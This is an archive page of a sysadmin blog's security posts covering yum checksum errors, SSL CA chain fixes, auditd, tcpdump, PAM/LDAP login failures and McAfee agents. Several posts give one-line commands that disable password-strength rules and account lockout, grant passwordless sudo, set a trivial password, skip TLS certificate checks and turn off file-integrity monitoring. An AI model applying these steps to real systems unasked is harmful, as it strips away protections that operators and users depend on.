Archive

Archive for the ‘Security’ Category

resolved – yum Error performing checksum Trying other mirror and finally No more mirrors to try

August 27th, 2015 Comments off

Today when I was installing one package in Linux, below error prompted:

[root@testhost yum.repos.d]# yum list --disablerepo=* --enablerepo=yumpaas
Loaded plugins: rhnplugin, security
This system is not registered with ULN.
ULN support will be disabled.
yumpaas | 2.9 kB 00:00
yumpaas/primary_db | 30 kB 00:00
http://yumrepo.example.com/paas_oel5/repodata/b8e385ebfdd7bed69b7619e63cd82475c8bacc529db7b8c145609b64646d918a-primary.sqlite.bz2: [Errno -3] Error performing checksum
Trying other mirror.
yumpaas/primary_db | 30 kB 00:00
http://yumrepo.example.com/paas_oel5/repodata/b8e385ebfdd7bed69b7619e63cd82475c8bacc529db7b8c145609b64646d918a-primary.sqlite.bz2: [Errno -3] Error performing checksum
Trying other mirror.
Error: failure: repodata/b8e385ebfdd7bed69b7619e63cd82475c8bacc529db7b8c145609b64646d918a-primary.sqlite.bz2 from yumpaas: [Errno 256] No more mirrors to try.

The repo "yumpaas" is hosted on OEL 6 VM, which by default use sha2 for checksum. However, for OEL5 VMs(the VM running yum), yum uses sha1 by default. So I've WA this by install python-hashlib to extend yum's capability to handle sha2(python-hashlib from external repo EPEL).

[root@testhost yum.repos.d]# yum install python-hashlib

And after this, the problematic repo can be used. But to resolve this issue permanently without WA on OEL5 VMs, we should recreate the repo with sha1 for checksum algorithm(createrepo -s sha1).

resolved – Unable to locally verify the issuer’s authority

August 18th, 2015 Comments off

Today we found below error in weblogic server log:

[2015-08-16 14:38:21,866] [WARN] [N/A] [testhost.example.com] [Thrown exception when ...... javax.net.ssl.SSLHandshakeException: General SSLEngine problem
......
Caused by: javax.net.ssl.SSLHandshakeException: General SSLEngine problem
......
Caused by: sun.security.validator.ValidatorException: PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target
at sun.security.validator.PKIXValidator.doBuild(PKIXValidator.java:323)

And we had a test on the linux server:

[root@testhost1 ~]# wget https://testurl.example.com/
--2015-08-17 10:15:56-- https://testurl.example.com/
Resolving testurl.example.com... 192.168.77.230
Connecting to testurl.example.com|192.168.77.230|:443... connected.
ERROR: cannot verify testurl.example.com's certificate, issued by `/C=US/O=Symantec Corporation/OU=Symantec Trust Network/CN=Symantec Class 3 Secure Server CA - G4':
Unable to locally verify the issuer's authority.
To connect to testurl.example.com insecurely, use `--no-check-certificate'.
Unable to establish SSL connection.

And tested using openssl s_client:

[root@testhost ~]# openssl s_client -connect testurl.example.com:443 -showcerts
CONNECTED(00000003)
depth=1 /C=US/O=Symantec Corporation/OU=Symantec Trust Network/CN=Symantec Class 3 Secure Server CA - G4
verify error:num=2:unable to get issuer certificate
issuer= /C=US/O=VeriSign, Inc./OU=VeriSign Trust Network/OU=(c) 2006 VeriSign, Inc. - For authorized use only/CN=VeriSign Class 3 Public Primary Certification Authority - G5
verify return:0
---
Certificate chain
0 s:/C=US/ST=California/L=Redwood Shores/O=Test Corporation/OU=FOR TESTING PURPOSES ONLY/CN=*.testurl.example.com
i:/C=US/O=Symantec Corporation/OU=Symantec Trust Network/CN=Symantec Class 3 Secure Server CA - G4
-----BEGIN CERTIFICATE-----
MIIFOTCCBCGgAwIBAgIQB1z+1jMRPPv/TrBA2qh5YzANBgkqhkiG9w0BAQsFADB+
MQswCQYDVQQGEwJVUzEdMBsGA
......
-----END CERTIFICATE-----
---
Server certificate
subject=/C=US/ST=California/L=Redwood Shores/O=Test Corporation/OU=FOR TESTING PURPOSES ONLY/CN=*.testurl.example.com
issuer=/C=US/O=Symantec Corporation/OU=Symantec Trust Network/CN=Symantec Class 3 Secure Server CA - G4
---
No client certificate CA names sent
---
SSL handshake has read 1510 bytes and written 447 bytes
---
New, TLSv1/SSLv3, Cipher is AES128-SHA
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
Protocol : TLSv1
Cipher : AES128-SHA
Session-ID: 2B5E228E4705C12D7EE7B5C608AE5E3781C5626C1A99A8D60D21DB2350D4F4DE
Session-ID-ctx:
Master-Key: F06632FD67E22EFB1134CDC0EEE8B8B44972747D804D5C7969095FCB2A692E90F111DC4FC6081F4D94C7561BB556DA16
Key-Arg : None
Krb5 Principal: None
Start Time: 1439793731
Timeout : 300 (sec)
Verify return code: 2 (unable to get issuer certificate)
---

From above, the issue should be caused by CA file missing, as the SSL certificate is relatively new using sha2. So I determined to download CA file from symantec, both "Symantec Class 3 Secure Server CA - G4" and "VeriSign Class 3 Public Primary Certification Authority - G5".

[root@testhost ~]# wget --no-check-certificate 'http://symantec.tbs-certificats.com/SymantecSSG4.crt'

[root@testhost ~]# openssl version -a|grep OPENSSLDIR

OPENSSLDIR: "/etc/pki/tls"

[root@testhost ~]# cp /etc/pki/tls/certs/ca-bundle.crt /etc/pki/tls/certs/ca-bundle.crt.bak

[root@testhost ~]# openssl x509 -text -in "SymantecSSG4.crt" >> /etc/pki/tls/certs/ca-bundle.crt

And test wget again, but still the same error:

[root@testhost1 ~]# wget https://testurl.example.com/
--2015-08-17 10:38:59-- https://testurl.example.com/
Resolving myproxy.example.com... 192.168.19.20
Connecting to myproxy.example.com|192.168.19.20|:80... connected.
ERROR: cannot verify testurl.example.com's certificate, issued by `/C=US/O=Symantec Corporation/OU=Symantec Trust Network/CN=Symantec Class 3 Secure Server CA - G4':
unable to get issuer certificate
To connect to testurl.example.com insecurely, use `--no-check-certificate'.
Unable to establish SSL connection.

Then I determined to install another CA indicated in the error log(G4 above may not be needed):

[root@testhost1 ~]# wget --no-check-certificate 'https://www.symantec.com/content/en/us/enterprise/verisign/roots/VeriSign-Class%203-Public-Primary-Certification-Authority-G5.pem'

[root@testhost1 ~]# openssl x509 -text -in "VeriSign-Class 3-Public-Primary-Certification-Authority-G5.pem" >> /etc/pki/tls/certs/ca-bundle.crt

This time, wget passed https:

[root@testhost1 ~]# wget https://testurl.example.com/
--2015-08-17 10:40:03-- https://testurl.example.com/
Resolving myproxy.example.com... 192.168.19.20
Connecting to myproxy.example.com|192.168.19.20|:80... connected.
Proxy request sent, awaiting response... 200 OK
Length: 11028 (11K) [text/html]
Saving to: `index.html'

100%[======================================>] 11,028 --.-K/s in 0.02s

2015-08-17 10:40:03 (526 KB/s) - `index.html' saved [11028/11028]

PS:
You can check more info here about adding trusted root certificates to the server - Mac OS X / Windows / Linux (Ubuntu, Debian) / Linux (CentOs 6) / Linux (CentOs 5)

resolved – VPN Service not available, The VPN agent service is not responding. Please restart this application after a while.

March 30th, 2015 13 comments

Today when I tried to connect to VPN through Cisco AnyConnect Secure Mobility Client, the following error dialog prompted:

 

VPN Service not available

VPN Service not available

And after I clicked "OK" button, the following dialog prompted:

The VPN agent service is not responding

The VPN agent service is not responding

So all of the two dialogs were complaining about "VPN service" not available/not responding. So I ran "services.msc" in windows run and found below:

vpn service

vpn service

When I checked, the service "Cisco AnyConnect Secure Mobility Agent" was stopped, and the "Startup type" was "Manual". So I changed "Startup type" to "Automatic", click "Start", then "OK" to save.

After this, Cisco AnyConnect Secure Mobility Client was running ok and I can connect through it to VPN.

resolved – error:0D0C50A1:asn1 encoding routines:ASN1_item_verify:unknown message digest algorithm

December 17th, 2014 Comments off

Today when I tried using curl to get url info, error occurred like below:

[root@centos-doxer ~]# curl -i --user username:password -H "Content-Type: application/json" -X POST --data @/u01/shared/addcredential.json https://testserver.example.com/actions -v

* About to connect() to testserver.example.com port 443

*   Trying 10.242.11.201... connected

* Connected to testserver.example.com (10.242.11.201) port 443

* successfully set certificate verify locations:

*   CAfile: /etc/pki/tls/certs/ca-bundle.crt

  CApath: none

* SSLv2, Client hello (1):

SSLv3, TLS handshake, Server hello (2):

SSLv3, TLS handshake, CERT (11):

SSLv3, TLS alert, Server hello (2):

error:0D0C50A1:asn1 encoding routines:ASN1_item_verify:unknown message digest algorithm

* Closing connection #0

After some searching, I found that it's caused by the current version of openssl(openssl-0.9.8e) does not support SHA256 Signature Algorithm. To resolve this, there are two ways:

1. add -k parameter to curl to ignore the SSL error

2. update openssl to "OpenSSL 0.9.8e-fips-rhel5 01 Jul 2008", just try "yum update openssl".

# openssl version
OpenSSL 0.9.8e-fips-rhel5 01 Jul 2008

3. upgrade openssl to at least openssl-0.9.8o. Here's the way to upgrade openssl: --- this may not be needed, try method 2 above

wget --no-check-certificate 'https://www.openssl.org/source/old/0.9.x/openssl-0.9.8o.tar.gz'
tar zxvf openssl-0.9.8o.tar.gz
cd openssl-0.9.8o
./config --prefix=/usr --openssldir=/usr/openssl
make
make test
make install

After this, run openssl version to confirm:

[root@centos-doxer openssl-0.9.8o]# /usr/bin/openssl version
OpenSSL 0.9.8o 01 Jun 2010

PS:

If you installed openssl from rpm package, then you'll find the openssl version is still the old one even after you install the new package. This is expected so don't rely too much on rpm:

[root@centos-doxer openssl-0.9.8o]# /usr/bin/openssl version
OpenSSL 0.9.8o 01 Jun 2010

Even after rebuilding rpm DB(rpm --rebuilddb), it's still the old version:

[root@centos-doxer openssl-0.9.8o]# rpm -qf /usr/bin/openssl
openssl-0.9.8e-26.el5_9.1
openssl-0.9.8e-26.el5_9.1

[root@centos-doxer openssl-0.9.8o]# rpm -qa|grep openssl
openssl-0.9.8e-26.el5_9.1
openssl-devel-0.9.8e-26.el5_9.1
openssl-0.9.8e-26.el5_9.1
openssl-devel-0.9.8e-26.el5_9.1

 

resolved – auditd STDERR: Error deleting rule Error sending enable request (Operation not permitted)

September 19th, 2014 Comments off

Today when I try to restart auditd, the following error message prompted:

[2014-09-18T19:26:41+00:00] ERROR: service[auditd] (cookbook-devops-kernelaudit::default line 14) had an error: Mixlib::ShellOut::ShellCommandFailed: Expected process to exit with [0], but received '1'
---- Begin output of /sbin/service auditd restart ----
STDOUT: Stopping auditd: [  OK  ]
Starting auditd: [FAILED]
STDERR: Error deleting rule (Operation not permitted)
Error sending enable request (Operation not permitted)
---- End output of /sbin/service auditd restart ----
Ran /sbin/service auditd restart returned 1

After some reading of manpage auditd, I realized that when audit "enabled" was set to 2(locked), any attempt to change the configuration in this mode will be audited and denied. And that maybe the reason of "STDERR: Error deleting rule (Operation not permitted)", "Error sending enable request (Operation not permitted)". Here's from man page of auditctl:

-e [0..2] Set enabled flag. When 0 is passed, this can be used to temporarily disable auditing. When 1 is passed as an argument, it will enable auditing. To lock the audit configuration so that it can't be changed, pass a 2 as the argument. Locking the configuration is intended to be the last command in audit.rules for anyone wishing this feature to be active. Any attempt to change the configuration in this mode will be audited and denied. The configuration can only be changed by rebooting the machine.

You can run auditctl -s to check the current setting:

[root@centos-doxer ~]# auditctl -s
AUDIT_STATUS: enabled=1 flag=1 pid=3154 rate_limit=0 backlog_limit=320 lost=0 backlog=0

And you can run auditctl -e <0|1|2> to change this attribute on the fly, or you can add -e <0|1|2> in /etc/audit/audit.rules. Please note after you modify this, a reboot is a must to make this into effect.

PS:

Here's more about linux audit.

arping in linux for getting MAC address and update ARP caches by broadcast

August 27th, 2014 Comments off

Suppose we want to know MAC address of 10.182.120.210. then we can log on one linux host which is in the same subnet of 10.182.120.210, e.g. 10.182.120.188:

[root@centos-doxer ~]#arping -U -c 3 -I bond0 -s 10.182.120.188 10.182.120.210
ARPING 10.182.120.210 from 10.182.120.188 bond0
Unicast reply from 10.182.120.210 [00:21:CC:B7:1F:EB] 1.397ms
Unicast reply from 10.182.120.210 [00:21:CC:B7:1F:EB] 1.378ms
Sent 3 probes (1 broadcast(s))
Received 2 response(s)

So 00:21:CC:B7:1F:EB is the MAC address of 10.182.120.210. And from here we can see that IP address 10.182.120.210 is now used in local network.

Another use of arping is to update ARP cache. One scene is that, you assign a new machine with one being used IP address, then you will not able to log on the old machine with the IP address. Even after you shutdown the new machine, you may still not able to access the old machine. And here's the resolution:

Suppose we have configured the new machine NIC eth0 with IP address 192.168.0.2 which is already used by one old machine. Log on the new machine and run the following commands:

arping -A 192.168.0.2 -I eth0 192.168.0.2
arping -U -s 192.168.0.2 -I eth0 192.168.0.1 #this is sending ARP broadcast, and 192.168.0.1 is the gateway address.
/sbin/arping -I eth0 -c 3 -s 192.168.0.2 192.168.0.3 #update neighbours' ARP caches

PS:

  1. You can run 'arp -nae'(linux) or 'arp -a'(windows) to get arp table.
  2. Here is more about arp sproof prevention (in Chinese. statistic binding/arp firewall/small vlan/PPPoE/immune network).
  3. Here is about Proxy ARP(join broadcast LAN with serial link on router).

tcpdump & wireshark tips

March 13th, 2014 Comments off

tcpdump [ -AdDefIKlLnNOpqRStuUvxX ] [ -B buffer_size ] [ -c count ]

[ -C file_size ] [ -G rotate_seconds ] [ -F file ]
[ -i interface ] [ -m module ] [ -M secret ]
[ -r file ] [ -s snaplen ] [ -T type ] [ -w file ]
[ -W filecount ]
[ -E spi@ipaddr algo:secret,... ]
[ -y datalinktype ] [ -z postrotate-command ] [ -Z user ] [ expression ]

#general format of a tcp protocol line

src > dst: flags data-seqno ack window urgent options
Src and dst are the source and destination IP addresses and ports.
Flags are some combination of S (SYN), F (FIN), P (PUSH), R (RST), W (ECN CWR) or E (ECN-Echo), or a single '.'(means no flags were set)
Data-seqno describes the portion of sequence space covered by the data in this packet.
Ack is sequence number of the next data expected the other direction on this connection.
Window is the number of bytes of receive buffer space available the other direction on this connection.
Urg indicates there is 'urgent' data in the packet.
Options are tcp options enclosed in angle brackets (e.g., <mss 1024>).

tcpdump -D #list of the network interfaces available
tcpdump -e #Print the link-level header on each dump line
tcpdump -S #Print absolute, rather than relative, TCP sequence numbers
tcpdump -s <snaplen> #Snarf snaplen bytes of data from each packet rather than the default of 65535 bytes
tcpdump -i eth0 -S -nn -XX vlan
tcpdump -i eth0 -S -nn -XX arp
tcpdump -i bond0 -S -nn -vvv udp dst port 53
tcpdump -i bond0 -S -nn -vvv host testhost
tcpdump -nn -S -vvv "dst host host1.example.com and (dst port 1521 or dst port 6200)"

tcpdump -vv -x -X -s 1500 -i eth0 'port 25' #traffic on SMTP. -xX to print data in addition to header in both hex/ASCII. use -s 192 to watch NFS traffic(NFS requests are very large and much of the detail won't be printed unless snaplen is increased).

tcpdump -nn -S udp dst port 111 #note that telnet is based on tcp protocol, NOT udp. So if you want to test UDP connection(udp is connection-less), then you must start up the app, then use tcpdump to test.

tcpdump -nn -S udp dst portrange 1-1023

Wireshark Capture Filters (in Capture -> Options)

Wireshark DisplayFilters (in toolbar)

 

EVENT DIAGRAM
Host A sends a TCP SYNchronize packet to Host BHost B receives A's SYNHost B sends a SYNchronize-ACKnowledgementHost A receives B's SYN-ACKHost A sends ACKnowledge

Host B receives ACK.
TCP socket connection is ESTABLISHED.

3-way-handshake
TCP Three Way Handshake
(SYN,SYN-ACK,ACK)

TCP-CLOSE_WAIT

 

The upper part shows the states on the end-point initiating the termination.

The lower part the states on the other end-point.

So the initiating end-point (i.e. the client) sends a termination request to the server and waits for an acknowledgement in state FIN-WAIT-1. The server sends an acknowledgement and goes in state CLOSE_WAIT. The client goes into FIN-WAIT-2 when the acknowledgement is received and waits for an active close. When the server actively sends its own termination request, it goes into LAST-ACK and waits for an acknowledgement from the client. When the client receives the termination request from the server, it sends an acknowledgement and goes into TIME_WAIT and after some time into CLOSED. The server goes into CLOSED state once it receives the acknowledgement from the client.

A socket can be in CLOSE_WAIT state indefinitely until the application closes it. Faulty scenarios would be like filedescriptor leak, server not being execute close() on socket leading to pile up of close_wait sockets. At java level, this manifests as "Too many open files" error. The value cannot be changed.

TIME_WAIT is just a time based wait on socket before closing down the connection permanently. Under most circumstances, sockets in TIME_WAIT is nothing to worry about. The value can be changed(tcp_time_wait_interval).

More info about time_wait & close_wait can be found here.

PS:

You can refer to this article for a detailed explanation of tcp three-way handshake establishing/terminating a connection. And for tcpdump one, you can check below:

[root@host2 ~]# telnet host1 14100
Trying 10.240.249.139...
Connected to host1.us.oracle.com (10.240.249.139).
Escape character is '^]'.
^]
telnet> quit
Connection closed.

[root@host1 ~]# tcpdump -vvv -S host host2
tcpdump: WARNING: eth0: no IPv4 address assigned
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
03:16:39.188951 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto: TCP (6), length: 60) host1.us.oracle.com.14100 > host2.us.oracle.com.18890: S, cksum 0xa806 (correct), 3445765853:3445765853(0) ack 3946095098 win 5792 <mss 1460,sackOK,timestamp 854077220 860674218,nop,wscale 7> #2. host1 ack SYN package by host2, and add it by 1 as the number to identify this connection(3946095098). Then host1 send a SYN(3445765853).
03:16:41.233807 IP (tos 0x0, ttl 64, id 6650, offset 0, flags [DF], proto: TCP (6), length: 52) host1.us.oracle.com.14100 > host2.us.oracle.com.18890: F, cksum 0xdd48 (correct), 3445765854:3445765854(0) ack 3946095099 win 46 <nop,nop,timestamp 854079265 860676263> #5. host1 Ack F(3946095099), and then it send a F just as host2 did(3445765854 unchanged). 

[root@host2 ~]# tcpdump -vvv -S host host1
tcpdump: WARNING: eth0: no IPv4 address assigned
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
03:16:39.188628 IP (tos 0x10, ttl 64, id 31059, offset 0, flags [DF], proto: TCP (6), length: 60) host2.us.oracle.com.18890 > host1.us.oracle.com.14100: S, cksum 0x265b (correct), 3946095097:3946095097(0) win 5792 <mss 1460,sackOK,timestamp 860674218 854045985,nop,wscale 7> #1. host2 send a SYN package to host1(3946095097)
03:16:39.188803 IP (tos 0x10, ttl 64, id 31060, offset 0, flags [DF], proto: TCP (6), length: 52) host2.us.oracle.com.18890 > host1.us.oracle.com.14100: ., cksum 0xed44 (correct), 3946095098:3946095098(0) ack 3445765854 win 46 <nop,nop,timestamp 860674218 854077220> #3. host2 ack the SYN sent by host1, and add 1 to identify this connection. The tcp connection is now established(3946095098 unchanged, ack 3445765854).
03:16:41.233397 IP (tos 0x10, ttl 64, id 31061, offset 0, flags [DF], proto: TCP (6), length: 52) host2.us.oracle.com.18890 > host1.us.oracle.com.14100: F, cksum 0xe546 (correct), 3946095098:3946095098(0) ack 3445765854 win 46 <nop,nop,timestamp 860676263 854077220> #4. host2 send a F(in) with a Ack, F will inform host1 that no more data needs sent(3946095098 unchanged), and ack is uded to identify the connection previously established(3445765854 unchanged)
03:16:41.233633 IP (tos 0x10, ttl 64, id 31062, offset 0, flags [DF], proto: TCP (6), length: 52) host2.us.oracle.com.18890 > host1.us.oracle.com.14100: ., cksum 0xdd48 (correct), 3946095099:3946095099(0) ack 3445765855 win 46 <nop,nop,timestamp 860676263 854079265> #6. host2 ack host1's F(3445765855), and the empty flag to identify the connection(3946095099 unchanged).

VLAN in windows hyper-v

November 26th, 2013 Comments off

Briefly, a virtual LAN (VLAN) can be regarded as a broadcast domain. It operates on the OSI
network layer 2. The exact protocol definition is known as 802.1Q. Each network packet belong-
ing to a VLAN has an identifier. This is just a number between 0 and 4095, with both 0 and 4095
reserved for other uses. Let’s assume a VLAN with an identifier of 10. A NIC configured with
the VLAN ID of 10 will pick up network packets with the same ID and will ignore all other IDs.
The point of VLANs is that switches and routers enabled for 802.1Q can present VLANs to dif-
ferent switch ports in the network. In other words, where a normal IP subnet is limited to a set
of ports on a physical switch, a subnet defined in a VLAN can be present on any switch port—if
so configured, of course.

Getting back to the VLAN functionality in Hyper-V: both virtual switches and virtual NICs
can detect and use VLAN IDs. Both can accept and reject network packets based on VLAN ID,
which means that the VM does not have to do it itself. The use of VLAN enables Hyper-V to
participate in more advanced network designs. One limitation in the current implementation is
that a virtual switch can have just one VLAN ID, although that should not matter too much in
practice. The default setting is to accept all VLAN IDs.

resolved – sshd: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=

November 20th, 2013 Comments off

Today when I tried to log on one linux server with a normal account, errors were found in /var/log/secure:

Nov 20 07:43:39 test_linux sshd[11200]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.182.120.188 user=testuser
Nov 20 07:43:39 test_linux sshd[11200]: pam_ldap: error trying to bind (Invalid credentials)
Nov 20 07:43:42 test_linux sshd[11200]: nss_ldap: failed to bind to LDAP server ldaps://test.com:7501: Invalid credentials
Nov 20 07:43:42 test_linux sshd[11200]: nss_ldap: failed to bind to LDAP server ldap://test.com: Invalid credentials
Nov 20 07:43:42 test_linux sshd[11200]: nss_ldap: could not search LDAP server - Server is unavailable
Nov 20 07:43:42 test_linux sshd[11200]: nss_ldap: failed to bind to LDAP server ldaps://test.com:7501: Invalid credentials
Nov 20 07:43:43 test_linux sshd[11200]: nss_ldap: failed to bind to LDAP server ldap://test.com: Invalid credentials
Nov 20 07:43:43 test_linux sshd[11200]: nss_ldap: could not search LDAP server - Server is unavailable
Nov 20 07:43:55 test_linux sshd[11200]: pam_ldap: error trying to bind (Invalid credentials)
Nov 20 07:43:55 test_linux sshd[11200]: Failed password for testuser from 10.182.120.188 port 34243 ssh2
Nov 20 07:43:55 test_linux sshd[11201]: fatal: Access denied for user testuser by PAM account configuration

After some attempts on linux PAM(sshd, system-auth), I still got nothing. Later, I checked /etc/ldap.conf with one other box, and found the configuration on the problematic host was not right.

I copied the right ldap.conf and tried log on later, and the issue resolved.

PS:

You can read more about linux PAM here http://www.linux-pam.org/Linux-PAM-html/ (I recommend having a reading on the System Administrators' Guide as that may be the only one linux administrators can reach. You can also get a detailed info on some commonly used PAM modules such as pam_tally2.so, pam_unix.so, pam_cracklib, etc.)

Here's one configuration in /etc/pam.d/sshd:

#%PAM-1.0
auth required pam_tally2.so deny=3 onerr=fail unlock_time=1200 #lock account after 3 failed logins. The accounts will be automatically unlocked after 20 minutes
auth include system-auth
account required pam_nologin.so
account include system-auth
password include system-auth
session optional pam_keyinit.so force revoke
session include system-auth
session required pam_loginuid.so

And here is from /etc/pam.d/system-auth:

#%PAM-1.0
# This file is auto-generated.
# User changes will be destroyed the next time authconfig is run.
auth required pam_env.so
auth required pam_tally2.so onerr=fail deny=3 audit silent
#auth required pam_tally2.so onerr=fail deny=3 unlock_time=300 audit silent
auth sufficient pam_fprintd.so
auth sufficient pam_unix.so try_first_pass
auth requisite pam_succeed_if.so uid >= 500 quiet
auth required pam_deny.so

account required pam_tally2.so onerr=fail
account required pam_unix.so
account sufficient pam_localuser.so
account sufficient pam_succeed_if.so uid < 500 quiet
account required pam_permit.so

#password required pam_cracklib.so retry=3 minlen=14 dcredit=-1 ucredit=-1 ocredit=-1 lcredit=-1 difok=3 enforce_for_root
password sufficient pam_unix.so sha512 shadow try_first_pass remember=5
#password sufficient pam_unix.so sha512 shadow try_first_pass use_authtok remember=5
password required pam_deny.so

session optional pam_keyinit.so revoke
session required pam_limits.so
session [success=1 default=ignore] pam_succeed_if.so service in crond quiet use_uid
session required pam_unix.so

You'll get error message "pam_tally2(sshd:auth): user test (502) tally 4, deny 3" in /var/log/secure when you try to log on the after the third time you entered wrong password. And "pam_tally2 --user test" will return 0 Failures after 20 minutes as you configured. You can run pam_tally2 --user test --reset to reset the number to 0.

You can disable pam_tally2 fully with below:

grep pam_tally2 /etc/pam.d/{sshd,login,system-auth}
cp /etc/pam.d/sshd /etc/pam.d/sshd.bak;cp /etc/pam.d/login /etc/pam.d/login.bak;cp /etc/pam.d/system-auth /etc/pam.d/system-auth.bak

sed -i '/pam_tally2/ s/^/# /' /etc/pam.d/sshd;sed -i '/pam_tally2/ s/^/# /' /etc/pam.d/login;sed -i '/pam_tally2/ s/^/# /' /etc/pam.d/system-auth;

 

make sudo asking for no password on linux

November 1st, 2013 Comments off

Assuming that you have a user named 'test', and he belongs to 'admin' group. So you want user test can sudo to root, and don't want linux prompting for password. Here's the way you can do it:

cp /etc/sudoers{,.bak}
sed -i '/%admin/ s/^/# /' /etc/sudoers
echo '%admin ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers

Enjoy!

disable linux strong password policy

November 1st, 2013 Comments off

You may enable strong password policy for linux, and can disable it of course. So here's the way if you want to disable it:

egrep 'pam_cracklib.so|use_authtok|enforce=/etc/pam.d/system-auth

/bin/cp /etc/pam.d/system-auth{,.bak}
sed -i '/pam_cracklib.so/ s/^/# /' /etc/pam.d/system-auth
sed -i 's/use_authtok//' /etc/pam.d/system-auth

sed -i 's/enforce=everyone/enforce=none/g' /etc/pam.d/system-auth
echo "password" | passwd --stdin username

PS:

  1. To enable strong password for linux, you can have a try on this http://goo.gl/uwdbN
  2. You can read more about linux pam here http://www.linux-pam.org/Linux-PAM-html/
  3. You can also disable pam_tally2 for not locking user accounts after several times of login failures. You can read this article for more info:

grep pam_tally2 /etc/pam.d/{sshd,login,system-auth}
/bin/cp /etc/pam.d/sshd /etc/pam.d/sshd.bak;/bin/cp /etc/pam.d/login /etc/pam.d/login.bak;/bin/cp /etc/pam.d/system-auth /etc/pam.d/system-auth.bak

sed -i '/pam_tally2/ s/^/# /' /etc/pam.d/sshd;sed -i '/pam_tally2/ s/^/# /' /etc/pam.d/login;sed -i '/pam_tally2/ s/^/# /' /etc/pam.d/system-auth;

tcp flags explanation in details – SYN ACK FIN RST URG PSH and iptables for sync flood

October 11th, 2013 Comments off

This is from wikipedia:

To establish a connection, TCP uses a three-way handshake. Before a client attempts to connect with a server, the server must first bind to and listen at a port to open it up for connections: this is called a passive open. Once the passive open is established, a client may initiate an active open. To establish a connection, the three-way (or 3-step) handshake occurs:

  1. SYN: The active open is performed by the client sending a SYN to the server. The client sets the segment's sequence number to a random value A.
  2. SYN-ACK: In response, the server replies with a SYN-ACK. The acknowledgment number is set to one more than the received sequence number i.e. A+1, and the sequence number that the server chooses for the packet is another random number, B.
  3. ACK: Finally, the client sends an ACK back to the server. The sequence number is set to the received acknowledgement value i.e. A+1, and the acknowledgement number is set to one more than the received sequence number i.e. B+1.

At this point, both the client and server have received an acknowledgment of the connection. The steps 1, 2 establish the connection parameter (sequence number) for one direction and it is acknowledged. The steps 2, 3 establish the connection parameter (sequence number) for the other direction and it is acknowledged. With these, a full-duplex communication is established.

You can read pdf document here http://www.nordu.net/development/2nd-cnnw/tcp-analysis-based-on-flags.pdf

H3C's implementations of sync flood solution http://www.h3c.com/portal/Products___Solutions/Technology/Security_and_VPN/Technology_White_Paper/200812/624110_57_0.htm

Using iptables to resolve sync flood issue http://pierre.linux.edu/2010/04/how-to-secure-your-webserver-against-syn-flooding-and-dos-attack/ and http://www.cyberciti.biz/tips/howto-limit-linux-syn-attacks.html

You may also consider using tcpkill to kill half open sessions(using ss -s/netstat -s<SYN_RECV>/tcptrack to see connection summary)

Output from netstat -atun:

The reason for waiting is that packets may arrive out of order or be retransmitted after the connection has been closed. CLOSE_WAIT indicates that the other side of the connection has closed the connection. TIME_WAIT indicates that this side has closed the connection. The connection is being kept around so that any delayed packets can be matched to the connection and handled appropriately.

more on http://kb.iu.edu/data/ajmi.html about FIN_wait (one error: 2MSL<Maximum Segment Lifetime>=120s, not 2ms)

All about tcp socket states: http://www.krenel.org/tcp-time_wait-and-ephemeral-ports-bad-friends/

And here's more about tcp connection(internet socket) states: https://en.wikipedia.org/wiki/Transmission_Control_Protocol#Protocol_operation

get linux server fingerprint through using ssh-keygen

July 31st, 2013 Comments off

Run ssh-keygen -lf  /etc/ssh/ssh_host_rsa_key.pub to get the server's fingerprint which respond to:

$ ssh <test-host>
The authenticity of host 'testhost[ip address]' can't be established.
RSA key fingerprint is <xx:xx:xx....>
Are you sure you want to continue connecting (yes/no)? yes

403 CoachingSessionExceeded – McAfee the culprit

December 18th, 2012 Comments off

Today I tried access one website within company's network which was very important to me. But the site loaded incompletely and so was not usable.

As always, company network is somehow restricted, for example, only output port 80 and 443 are enabled in my company's network. As many companies do, McAfee software is used to restrict internal employees surfing the internet. So I firstly thought McAfee was the culprit.

As I'm using chrome browser, so I press F12 to open the developer tools. On "Network" tab(you may need ctrl+F5 to forcely refresh the website), I found the following error status:

Then I opened that url source in a new tab, and the following page occured:

So everything sorted! I clicked the button "click here if you have read ....", and then went back to the site, refresh, and later everything was ok!

McAfee Solidcore agent and McAfee agent management

June 14th, 2012 Comments off

The File Integrity Monitoring (FIM) agents on Solaris and Redhat servers is made up of 2 components, a Solidcore Agent and a McAfee Agent.

  • The Solidcore agent is the element that performs the file monitoring. It runs as a kernel module and needs a kernel restart ( reboot ) to disable it.
  • The McAfee agent is responsible for communication back to a central McAfee Enterprise Policy Orchestrator ( EPO ) server. It runs as a service (cma) that can be stopped with minimal impact to the running server. The software can also easily be removed or reinstalled without and impact.

With both Solidocre and a Mcafee agent running, the centralised ePO will control the 'policy' of files to be monitored on the host. this can be overridden in the OS if need be using commands in the Additional Tasks section below.

Status check
To query the status of solidcore on a server ( as root ) run
# sadmin status

To query the policy a server is running with, the local config needs to be 'unlocked' To do this, 'recover' the config and query the policy.
# sadmin recover #( password required, available from the epo administrator )
# sadmin mon list
# sadmin lockdown

Restart
The McAfee agent has an associated service 'cma' which can be stopped and restarted while the server is running.
- Stopping the service
service cma stop

- Starting the service
service cma start

The Solidcore agent has an associated service 'scsrvc'
- Stopping the service
service scsrvc stop

- Starting the service
service scsrvc start

Note:
The solidcore agent runs as part of the UNIX kernel. Stopping the 'scsrvc' service doesn't fully disable the solidcore software.
To do this :
- Open the local configuration for editing
sadmin recover #{ password needed from the ePO Administrator )

- Set the agent to be disabled at next reboot
sadmin disable

- Close the local configuration for edits
sadmin lockdown

'REBOOT'

when the server comes back the agent will be disabled. This can be confiremd by running :
sadmin status

modify sudoers_debug in ldap.conf to debug sudo on linux and solaris

May 22nd, 2012 Comments off

If you encountered some problem when doing sudoCommand, you will be happy if there's debug info showed in console. To show detailed debug info when doing sudo, modify /etc/ldap.conf(for both solaris ldap and linux ldap):

# verbose sudoers matching from ldap
sudoers_debug 2

